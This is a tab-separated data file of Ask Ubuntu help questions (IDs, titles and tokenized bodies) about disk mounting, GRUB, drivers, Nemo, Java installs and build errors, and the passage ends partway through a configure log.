190442	mount point space is not the same as the hdd	i 'm new to linux and i have question about mount point i have two hdd in my system , one 500gb and one 1tb the 500 is used for os and swap , the 1tb is for storage only the 500gb is name sda1 and 1tb is sdb1 i first mount the 1tb drive to /media/sdb1 then i create a folder and add some test file in . i then i unmount it and remount it to /media/data . however , in media folder , sdb1 folder is still exists with folder and test file i added in earlier . i also have data folder with nothing inside . is this normal ? i was expecting that i should get my folder + test data in the data folder when i remount and the sdb1 folder should be gone . also free space in both sdb1 folder and data folder shows only about 400+gb . if this is really the 1tb hdd , i should get 900+gb of free space . moreover , looking in gparted , it 's shows that 500gb hdd is mounted to / and 1tbhdd is mounted to /media/data with 14gb used space . 14gb ? ? i did n't add in anything yet , how can it already use 14 gb ? is there anyway to tell if the folder ( mount point ) is actually the 1tb drive ? here is the result of a mount command /dev/sda1 on / type ext4 ( rw , errors=remount-ro , usrquota , grpquota , acl , user_xattr ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/chin/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=chin ) /dev/sr0 on /media/hpss870b_64 type iso9660 ( ro , nosuid , nodev , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 , uhelper=udisks ) sdb1 does n't even exist here thanks
190446	where does deja-dup log its errors ?	i configured deja-dup to make a daily backup of my whole data drive . now i get an error message each time , telling me , that not all files could be backuped . but i can not find any deja-dup logs in /var/log nor in the syslog . where does it display the missing files ?
190451	updating ubuntu	i installed 9.04 from a disc but apparently need to download a new image then burn a cd to get n upgrade to later versions ( v12 ) as there is no supported upgrade from 9.04 . when i try to download the latest version i find my partition has n't got sufficient space , but have no idea if ( or how ) i can resize the partition to store the image before i can burn the cd to update my version . caught in a bit of a viscious circle here ! any suggestions please ?
190452	ubuntu center does n't accept ubuntu dvd	i just wanted to install a disk manager with the help of ubuntu software center . to install this disk manager ubuntu asks me to insert the ubuntu cd/dvd . i inserted the cd and clicked on `` continue '' ( i translate from another language . maybe it is another word , but i do n't think so ) . after i clicked on continue ubuntu software center aks me to insert the cd/dvd again ... but i put it already in the cd/dvd . i also insert the same dvd with wich i installed ubuntu . maye some necessary further info : ubuntu center asks me to insert : ubuntu 12.04.1 lts_precise pangolin_release amd 64 ( 20120823.1 ) the dvd 's name is : ubuntu 12.04.1 lts amd64 any suggesstions ? thanks .
190454	installed fprint , ca n't login anymore	tried fprint , was stupid enough not to backup the common-auth file before changing it . somehow i 'm locked out of the system , trying to fingerscan does n't do any difference . even when i 've done it 5 times and it asks for password , when it asks for password and i write it in and it says that it 's the wrong password . i use the same password for root as for my user . tried to go into recovery mode - > root - > sudo nano /etc/pam.d/common-auth and remove the rows saying that you need the fingerprint to login , but when i try to overwrite , it says the file is read only , even when i try to open it with root . i have a lot of schoolwork files and programs on the system , so i ca n't afford losing them . help ?
190458	how can i use the voice recognition used by android on ubuntu ?	if i 'm developing an android app that uses tts and voice recognition , which libraries are used for the same voice recognition and speech on ubuntu ? i 'm assuming espeak for text to speech , but i 'm unsure which voice recognition library and dictionary/learning/calibration system is used for voice recognition . i'ld like to make the app available on ubuntu desktop . as well as test it outside an emulator
190466	how to dual-boot ubuntu and android on lenovo s10-3t ?	i have a problem with installing android on ubuntu . i have already 12.04 installed on ideapad lenovo s10-3t but i did n't leave an empty partition for android . is it possible to separate it now or do i have to reboot ubuntu ?
190467	how to prevent thunderbird from updating automatically ?	today at startup my tb ( not precisely sure what version it was ) asked if it should check compatibility of the lightning calendar addon . that is to say it displayed in a list windows the only item : lightning and said it was not compatible . choices were `` check '' or `` do n't '' check compatibility . i clicked on check and after nothing happened for several minutes on `` cancel '' . so , now my tb is upgraded to 15.0 and lightning is n't there anymore . it never asked me to upgrade anyway and i urgently need my calendar now . any suggestions warmly welcome ! holger edit : solved ! i had to reinstall lightning and provider for google calendar addons - although they were already installed and obviously falsely not found compatible . the question now is how to avoid automatic updates in tb in general ...
190475	how to install new software on ubuntu 12.04 lts ?	i am new to use new ubuntu , what command to install something on ubuntu terminal ?
190476	how can i drag file from nautilus to brasero ?	i want to drag a file from nautilus to brasero in ubuntu 12.04 when both windows are open . the only way to do it that i know currently is to maximize brasero and left the nautilus open ( but not minimized ) and so i can drag the file to the window that it is below , but i wonder if there is a more quick way to do it . thanks for your help !
190479	why are the man pages for gvfs-commands not in ubuntu ?	these are the man pages for gvfs-cat gvfs-less gvfs-monitor-dir gvfs-move gvfs-rm gvfs-trash gvfs-copy gvfs-ls gvfs-monitor-file gvfs-open gvfs-save gvfs-tree gvfs-info gvfs-mkdir gvfs-mount gvfs-rename gvfs-set-attribute http : //www.unix.com/man-pages.php ? query=gvfs-info & apropos=0 & section=1 & os=opensolaris every year i see that there are more commands without manpage nor apropose description , nothing ! is that the path ?
190480	ubuntu only working with second monitor	i 'm using the try ubuntu selection from my ubuntu cd . for some reason , the screen on my laptop is completely black . only when i hook to my second monitor does ubuntu show up , and then , its only on the second monitor . any help ? thanks in advance .
190483	minimize window with docky conflicts with unity	i 'm seeing this unwanted behaviour eversince unity came to ubuntu . the unity 's launcher randomly `` steals '' the endpoint for the minimizing animations from docky . in other words , when i click on an icon in docky to minimize a window , that window minimizes to unity instead of docky . that happens most of the time to all of the windows , although sometimes , also randomly , it happens that the windows minimize to docky , but very rarely . here 's how it looks when i minimize a window : here 's how both animations should look :
190484	wifi problem - it says firmware missing - ubuntu version 12.04 desktop	the following is the output of lspci from a terminal : 00:00.0 host bridge : nvidia corporation mcp79 host bridge ( rev b1 ) 00:00.1 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.0 isa bridge : nvidia corporation mcp79 lpc bridge ( rev b2 ) 00:03.1 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.2 smbus : nvidia corporation mcp79 smbus ( rev b1 ) 00:03.3 ram memory : nvidia corporation mcp79 memory controller ( rev b1 ) 00:03.5 co-processor : nvidia corporation mcp79 co-processor ( rev b1 ) 00:04.0 usb controller : nvidia corporation mcp79 ohci usb 1.1 controller ( rev b1 ) 00:04.1 usb controller : nvidia corporation mcp79 ehci usb 2.0 controller ( rev b1 ) 00:06.0 usb controller : nvidia corporation mcp79 ohci usb 1.1 controller ( rev b1 ) 00:06.1 usb controller : nvidia corporation mcp79 ehci usb 2.0 controller ( rev b1 ) 00:08.0 audio device : nvidia corporation mcp79 high definition audio ( rev b1 ) 00:09.0 pci bridge : nvidia corporation mcp79 pci bridge ( rev b1 ) 00:0a.0 ethernet controller : nvidia corporation mcp79 ethernet ( rev b1 ) 00:0b.0 sata controller : nvidia corporation mcp79 ahci controller ( rev b1 ) 00:0c.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:0d.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:10.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:15.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:16.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:17.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 00:18.0 pci bridge : nvidia corporation mcp79 pci express bridge ( rev b1 ) 01:07.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 01:07.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 01:07.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 01:07.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 04:00.0 vga compatible controller : nvidia corporation c79 [ geforce 9400m g ] ( rev b1 ) 07:00.0 network controller : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller ( rev 01 )
190486	dual boot on hp envy ultrabook	i just bought a hp envy ultrabook 1002tx . it comes with a win7 home basic and a 32gb ssd + 500gb hdd . i started to install ubuntu and in doing so went and deleted all the partitions on my hdd and recreated them the way i wanted . then when i tried to install ubuntu it did n't recognize my hdd . to solve this i typed dmraid -e -r /dev/sdx where the 'x ' was my ssd drive . after this ubuntu can install but windows for some reason does not install . also the intel caching feature is lost and ssd is just sitting and doing nothing . i want to know how to solve this problem . ideeally i would like to use the ssd for caching , either in windows or ubuntu . how do i get the ssd back to working as an intel rapid cache ? how do i get windows to install properly ? it tell me that windows is unable to configure itself to my hardware , and my pc came with windows pre-installed so this is not possible . sorry for the long question and thanks for your answers ! ps : at one time when i booted i pressed ctrl+i and went to the intel rapid cache menu . i think i screwed up something in here , because only after this the rapid cache stopped working , and each time i booted the pc thought the bios was my primary disk .
190487	how to start gkrellm so that it shows up on all virtual desktops ?	i 'd like to open the gkrellm system monitor so that it is present on all virtual desktops . how to do that ? using ubuntu 11.04 ( natty ) & classic gnome ( not unity ) . bonus questions : how to skip the gkrellm window from the taskbar ( on the bottom of the screen ) ? how to launch it automatically when logging in ? ( i can ask those separately , too . or please point out if some of these are already covered . )
190488	i ca n't change my screen resolution	i am newer to ubuntu . recently i bought intel® core™ i3-2120 cpu @ 3.30ghz ( intel hd graphics 2000 display ) with dell in2030m monitor . i installed ubuntu 12.04 lts version . my problem is , i ca n't change my screen resolution > 1024 because the monitor was not detected , it says unknown . help please .
190489	touchpad not working in ubuntu 12.04	i have installed ubuntu 12.04 from windows vista ( wubi ) and use it as a dual boot . however while in the process of installing i turned the touch pad off . and after installation the touchpad is not working . i am using the dual boot in a compaq cq40 317-tu laptop .
190495	what tablets might ubuntu 12.04 and unity work on ?	i have seen ubuntu run through emulators on android , but with lightweight environments rather than unity . i 'm asking because i would like to find a cheap tablet i could possibly use in place of my current netbook . and i would prefer a full desktop operating system like ubuntu rather than ios or android . what tablets , if any might ubuntu and unity run on ? or would it only run with laptop/tablets ?
190505	connection to server failed error	there is a website of a browser game tanki online . i can open the website but when i try to connect from either ubuntu or linux mint to any of their servers for playing it gives me an error message like connection to server ... failed or something similar . i assume this is the firewall issue but any solution which i get does n't help me . any idea on how to solve it is appreciated . thank you .
190512	how to package closed-source softwares	how to package close source application ( proprietary ) . i know how to package open-source apps using dh_make and pbuilder but using this method others can see my source code . is there any way for doing this without posiblitiy of exposing source code . i ca n't just send archive to ubuntu software center because they do n't know where to put each file . so can you help me with this .
190515	how do i turn on a login page for bugzilla ?	i have bugzilla 4.2.1 running on my ubuntu 11.10 , it working as it should and everything is fine . now when somebody accesses the url www.myapplication.com/bugs without logging in , it allows the user to view bugs and all the product/version/etc . how do i make sure that this does n't happen , i.e . anonymous user dont have any access except to the login page . ?
190519	are files uploaded to ubuntu one a single instance or are changes to that file also uploaded ?	if i upload a file to ubuntu one that i constantly make changes to ( ie a password tracking apps ' storage file ) are the changes to that file automatically tracked/uploaded when i sync from my android device ?
190520	how do i get an acer nplify 802.11b/g/n wireless card working ?	i use windows 7 and ubuntu 10.04 on my laptop : acer aspire 5349 . ubuntu 10.04 does n't work with lan and wlan . where can i download a driver : atheros wlan ar5b91 driver i want .deb only , can that ? thank you
190521	completely uninstall ubuntu	i am attempting to uninstall ubuntu . i purchased a copy of windows 7 and i need to completely wipe ubuntu from my laptop . i did not dual install ubuntu and windows when i started using ubuntu , i simply wiped windows from my hard drive . can anyone help please ! ! ! thanks
190526	netbeans does n't display properly after permission change	so basically i installed netbeans 7.2 through the site and everything worked fine . i then changed permissions for /var/www so that my apache2 could write on it without problems . after that netbeans started behaving strangely and giving errors and the fonts where all ugly . so i re-installed it but the problem continued . i have options in tools that do n't even show up anymore . if i open with sudo the fonts come up nicely again , but the amount of options still is n't the same as the original installation can anyone help me ?
190527	best low range graphic card for ubuntu	i have a amd hd5770 but i have big issues with the driver . so i decided to invest in a card that is more `` ubuntu friendly '' . i need a card with 2 dvi ports . im going to run virtualbox and some light gaming . maybe the gt620 could meet my needs ?
190529	how to completely integrate nemo with ubuntu ?	i have installed nemo ( a fork of nautilus created by the linux mint team ) in my ubuntu 12.04.1 lts with gnome shell 3.4.2 . i followed the instructions defaultfilemanager on help.ubuntu.com , changing the `` inode '' and `` x-directory '' in the file `` defaults.list '' , to make nemo my default file manager . now everything works perfectly , except for one thing : opening folders from desktop . i have set the option `` have file manager handle the desktop '' on . cool . the problem is that the desktop seems to be handled by nautilus only , even if i have set another file manager as default . every time i double click a folder on the desktop , it is opened by nautilus , not nemo . does anybody know how to fix this ?
190534	grub not showing when installed on a separate boot partition	i just installed ubuntu 12.04 using a different partition for the /boot ( i do n't know why exactly i did this , i remembered reading somewhere on the web about this ) . the thing is that after this operation , the grub is not showing at boot , so the computer is loaded directly into windows . the partitions available on my hdd look something like this : ubuntu partition - > mounted / swap area partition ubuntu boot partition - > mounted /boot windows partiton windows system reserved partition ( was created automatically ) what should i do in order to have grub showing at boot ? i searched for this kind of issues on the internet ( including this website ) and found that i could boot using a live cd and install a program called boot-repair and try using it to fix the problem . i 'm thinking also of booting using the live cd and from a terminal to reinstall grub using another partition ( the main /dev/sda i suppose ) . what do you think ? what is the proper solution for this situation ? perhaps editing the grub config file would be another option ( i do n't know exactly how , but it could work ) ? edit : since an internet connection was n't available so i could install the boot-repair , what i did was the following : booted using a live cd and went to a terminal mounted the ubuntu install partition , the initial separated /boot partition and also the /sys , /proc , /run , /dev chrooted into the ubuntu install reinstalled the grub using /dev/sda as location updated grub at this point the grub update said it detected two linux images , one free dos and another windows system . i thought everything was fine , so i restarted the computer . but when the grub shows up , there are only two options to select from , the free dos and the windows . what did i do wrong ?
190535	is it possible to use nautilus actions with nemo ( a nautilus fork ) ?	i have installed nemo ( a nautilus fork ) in my ubuntu 12.04.1 lts with gnome shell 3.4.2 . i used to use some of these scripts with nautilus . now that i have installed nemo , i ca n't use them anymore . so i was wondering if there is any way to use them with nemo , considering this one is a fork of nautilus . i do n't know , i just thought maybe i could edit the scripts ( where are they stored , by the way ? ) and change the word `` nautilus '' to `` nemo '' , so that they would appear on nemo 's context menu . is that simple like that or am i daydreaming too much ?
190539	search through a certain manpage-section in all man pages	i would like to search through subsection files in all man pages . i have tried man -k files : resolv.conf and man -k -s files resolv.conf in no way how can i do that ?
190540	how do i display the current local temp . ?	before i updated to 12.04 , right next to the clock it used to display my current local outdoor temp . is there a way to get that back ? i found it to be very useful . thank you .
190542	firewall settings for vlc ( streaming )	i 'm watching online tv with vlc and http : //mafreebox.freebox.fr/freeboxtv/playlist.m3u . does anybody know which ports and protocol must be enabled in my firewall settings ? i 've been searching on the videolan website , unsuccessfully so far . thanks in advance .
190544	12.04 - network manager not started at boot	i am on ubuntu 12.04 , 64-bit , fresh install . i have a wired connection ( eth1 interface ) , the ip address is assigned by dhcp , and peap authentication ( wpa_supplicant ) is set up . my problem is that network does not start at boot . i have to log in without internet connection , and then i have to start network-manager manually ( sudo start network-manager ) . it works , the connection starts and i am online . so my problem is why network manager does not start at boot ? in /var/log/syslog i found the following messages : init : network-interface ( lo ) pre-start process ( 589 ) terminated with status 1 init : network-interface ( eth1 ) pre-start process ( 590 ) terminated with status 1 init : network-interface ( lo ) post-stop process ( 604 ) terminated with status 1 init : network-interface ( eth1 ) post-stop process ( 606 ) terminated with status 1 and a bit further init : networking main process ( 873 ) terminated with status 1 i am new to ubuntu , i tried to find a solution by myself , but i totally failed . please , can anybody help ?
190548	how do i add parameters to programs launched from lubuntu 's application launch bar ?	i 've just started trying out lubuntu 12.04 . i know i can edit ~/.config/openbox/lubuntu-rc.xml to assign keyboard shortcuts to open programs with certain parameters . for example , i can specify that ctrl+alt+t opens lxterminal with a certain size like this : < ! -- launch a terminal on ctrl + alt + t -- > < keybind key= '' c-a-t '' > < action name= '' execute '' > < command > lxterminal -- geometry=148x30 < /command > < /action > < /keybind > but how do i do the same thing for lxterminal when started by clicking on its icon in my application launch bar ? in other words , i 'd like to have the same-sized terminal window if i click on the lxterminal icon in the application launch bar or if i start lxterminal using ctrl+alt+t . is it possible ? how do i do that ? as far as i could make out , editing ~/.config/lxterminal/lxterminal.conf by adding geometry=148x30 does n't help .
190549	script for creating multiple zip archives from multiple folders	i want to be able to right click multiple folders inside of a directory in nautilus , and be able to create separate zip archives from those folders in that same directory . if possible it would also be great if it automatically deleted the old folders . so , if i have 30 folders , i want to select those using control-shift , then go to scripts and run the script , and just have those 30 folders compressed into separate .zip archives , and have the old folders deleted ( if possible ) . anyone know how to accomplish this ? i am not good with terminal , and am looking for a script solution .
190551	display error when installing ubuntu	when installing ubuntu 12.04 from a usb-stick , as soon as installer runs , an error message appears and i can only see the upper half of the screen . for the way the pointer dissappears at the bottom appearing directly at the top of the display , it looks as if both halves of the screen were overlapsed in the upper half . any ides of how to solve this ? i tried to change de resolution at the display options with the little i could see , but this would n't work .
190555	how to recover missing folders in a windows-ubuntu dual-boot system ?	i have windows 7 and ubuntu 12.04 as dual-boot and on the same 500gb hdd . i have partitioned the drive into ntfs file system from windows before i installed edubuntu 12.04 in the remaining free space . now , there is a drive ( g : ) accessible through windows and has few folders . i boot into edubuntu and create a folder `` lintor '' and download movies and few software from torrentz . before i download , it showed 49gb free out of 62gb . after all the downloads it showed 31gb free out of 62gb . then i boot into windows and i could n't find this `` lintor '' folder . i wondered that might be happening as i hibernate edubuntu ( using sudo pm-hibernate ) and then boot into windows . i then create another folder in the same drive ( g : ) with the name `` 001 '' to check if this was accessible from edubuntu . now i reboot into edubuntu to find that `` lintor '' folder has disappeared and `` 001 '' folder was n't showing up either . surprisingly , the drive size still shows 31gb free out of 62gb but when i check it from windows , it shows 49gb free of 62gb . there is one thing i would like to mention . when i was trying to unmount the ntfs drive ( g : ) from edubuntu before booting into windows , it prompted me with this message : do you want to empty the trash before you unmount the drive ? once the trash is emptied the data is permanently deleted and can not be recovered . please help me understand what could be the problem and how do i recover the missing folder ?
190565	building failed because of `` package x11 not found ''	i am trying to build an application i am making into launchpad for my ppa , and , while it builds the deb just fine locally , it fails in launchpad . the build log complains that project error : package x11 not found while i totally build-depend on libx11-dev , and a package named x11 does not exist ! here 's the ppa : https : //launchpad.net/~hakermania/+archive/macropolo/+packages the buildlog ( i386 ) : https : //launchpadlibrarian.net/115106043/buildlog_ubuntu-precise-i386.macropolo_0.3-0ubuntu1_failedtobuild.txt.gz can you please solve this mystery ?
190570	acer extensa 5630 becomes slow and function key does not working well when connected to a projector	i connect my ubuntu 12.04.1 on acer extensa 5630 to a sony projector for presentation , but the system become slow and function key does not working well , when i pree it my laptop monitor goes off and projector screen works , after sometime my desktop with mouse pointer are all on projector screen but laptop monitor displays the presentation . please give me an idea to rectify it .
190574	free offline translator or dictionary	i work on a computer without internet . i need a translator or dictionary , which can be easily installed without the internet , and work offline .
190575	copy terminal result from one window to another	i often have many terminals open when working ( gnome terminal 3.4.1.1 , bash ) . quite often i need to copy the results of one terminal into another . an common scenario : terminala > pwd /home/hooked/foo terminalb > cp * /home/hooked/foo i usually end up copy pasting with the mouse . is there a keyboard shortcut for what i 'm trying to achieve ?
190577	what factors should be considered when installing packages manually ?	i have seen many packages ' readme or install files on instructing how to install a package manually . but many times the results are erroneous . they instruct us to do many thing with for example the configure file . but many , many factors are involved in this procedure ( dependencies , make , path variables and much more ) . i am yet able to install a single package manually . what are the common factors that should be considered with manual installations ?
190582	installing java automatically ( with silent option )	i 'm trying to install java through apt-get . i found this ppa of java installers , however , when i add the repository , update and then issue the apt-get install -y command , the installer for java takes over and it pops up a configuration option . i 'm hoping to be able to install it without any intervention or pressing of keyboards since i am creating build and deploy scripts for my ec2 instances which will automatically install all of the tagged packages that it needs . is there any other options ?
190585	why is my hard drive mounted on /boot ?	i was doing an update and it said that the drive was full . here is df -h : filesystem size used avail use % mounted on 78g 2.7g 72g 4 % / none 242m 184k 242m 1 % /dev none 247m 0 247m 0 % /dev/shm none 247m 48k 247m 1 % /var/run none 247m 0 247m 0 % /var/lock none 247m 0 247m 0 % /lib/init/rw /dev/sda1 228m 225m 0 100 % /boot here is fdisk -l : disk /dev/sda : 85.9 gb , 85899345920 bytes 255 heads , 63 sectors/track , 10443 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00035711 device boot start end blocks id system /dev/sda1 * 1 32 249855 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 32 1045 8136705 5 extended /dev/sda3 1045 10444 75498496 83 linux /dev/sda5 32 1045 8136704 8e linux lvm here is mount : /dev/mapper/sprintsftp-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) /dev/sda1 on /boot type ext2 ( rw ) here is /etc/fstab : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/machine-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=08ddfaa4-0da2-405e-95b2-b228a95dc761 /boot ext2 defaults $ /dev/mapper/machine-swap_1 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 how can i fix /dev/sda1 being mounted on /boot ?
190591	usb internet not accessible	i 'm brand new to ubuntu and linux . we access internet from a usb stick issued by a local telephone company . when i plug the stick into the computer , i see the device listed under internet connections as a mobile broadband device but it is grayed out and inaccessible . i tried to create a new mobile broadband connection but my country ( gabon ) is not listed and we have no payment plans per se ( we pay from a pre-paid card system ) .. any clues as to how i can get the system to recognize the internet connection ? thanks for any help ...
190594	is it possible to get a epson aculaser m1400 laser printer working ?	i have a new epson aculaser m1400 laser printer and i ca n't print from linux ( my system is ubuntu 12.04 lts . ) the aculaser m1200 can use the use the epl6200l driver from http : //www.avasys.jp/lx-bin2/linux_e/laser/dl1.do . and the m1400 ?
190595	dell powerdge840 2.4ghz 64 bit quad core	i am having an issue , where i have changed the boot order to cdrom and turned off hd boot all together and still my system is unable to detect ubuntu and claims , no boot device found . some additional information : when this same cd is inserted and dell is booted into win 2003 server ( which is what is installed on this machine ) , it detects the cd drive but not the cd at all ( keeps asking me to insert disc ) i have also created a bootable flash drive using linuxlive usb creator and when this is selected in boot order again am told no boot device detected . i was speaking to dell and they suggested perhaps there are no drivers on the actual ubuntu installation for the hardware on this dell and hence the failure of this dell to detect the ubuntu cd . now , i do n't know too much about computers , but this last bit confused me a bit . if the system detects the hardware ( when it is booting it sees the cd rom and in bios it sees when the flash drive is connected ) , then should n't it be able to read what is on those drives ? however , if there is some firmware or software install that needs to happen , could someone please tell me where to find the correct drivers for ubuntu and dell poweredge to work together ? shall i be installing the desktop version or the server edition , also , 32 bit or 64 bit ?
190597	step by step guide to install web apps feature in ubuntu 12.04 with screen-shots and steps till end	can anyone please give me a step-by-step guide to installing the web apps feature in ubuntu 12.04 . please include screenshots and clearly separated steps from beginning to end . it would be very helpful to me and other new users as well . thank you for your answer . but it did not help . i get the following result . 404 not found [ ip : 91.189.91.13 80 ] fetched 5,210 b in 1min 15s ( 68 b/s ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/index w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-security_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i am encountering this error for 2 months . please help me out of this . i get this error while updating as well . please get me out of this . i also tried changing my server to main server . this also did not help .
190602	analog sticks not working , qtsixa+pcsx combination	a few days ago i finally got my ps3 controller to work with qtsixa , and then in pcsx after some tweaking with the controls . but , i have n't figured out how on earth i will be able to get the analog sticks working . i 've been triyng to add them in the controls for all angles in pcsx , where you move the analog stick the way it 's supposed to be and then clicking a button to change the setting . i 've enabled joysticks in the options for the controller , and my options in my controller are : [ x ] enable buttons [ x ] enable sensitive buttons [ x ] enable axis [ ] enable accellerometers [ ] enable acceleration [ ] enable speed [ ] enable position the controller is a standard ps3 controller , dualshock 3 . plugged in with usb cable . thanks in forehand !
190604	how to install spatialite 3 on 12.04 ?	i 'm having some problems to install spatialite 3 on ubuntu 12.04 , those are the steps to i did : 1 ) sudo apt-get install libsqlite3-dev libgeos-dev 2 ) libspatialite-3.0.0-stable $ ./configure result : configure : error : can not find proj_api.h , bailing out checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for stdlib.h ... ( cached ) yes checking stdio.h usability ... yes checking stdio.h presence ... yes checking for stdio.h ... yes checking for string.h ... ( cached ) yes checking for memory.h ... ( cached ) yes checking math.h usability ... yes checking math.h presence ... yes checking for math.h ... yes checking float.h usability ... yes checking float.h presence ... yes checking for float.h ... yes checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking for inttypes.h ... ( cached ) yes checking stddef.h usability ... yes checking stddef.h presence ... yes checking for stddef.h ... yes checking for stdint.h ... ( cached ) yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking for unistd.h ... ( cached ) yes checking sqlite3.h usability ... yes checking sqlite3.h presence ... yes checking for sqlite3.h ... yes checking sqlite3ext.h usability ... yes checking sqlite3ext.h presence ... yes checking for sqlite3ext.h ... yes checking for g++ ... no checking for c++ ... no checking for gpp ... no checking for acc ... no checking for cc ... no checking for cxx ... no checking for cc++ ... no checking for cl.exe ... no checking for fcc ... no checking for kcc ... no checking for rcc ... no checking for xlc_r ... no checking for xlc ... no checking whether we are using the gnu c++ compiler ... no checking whether g++ accepts -g ... no checking dependency style of g++ ... none checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking how to run the c preprocessor ... gcc -e checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert i686-pc-linux-gnu file names to i686-pc-linux-gnu format ... func_convert_file_noop checking how to convert i686-pc-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... dlltool checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking for an ansi c-conforming const ... yes checking for off_t ... yes checking for size_t ... yes checking whether time.h and sys/time.h may 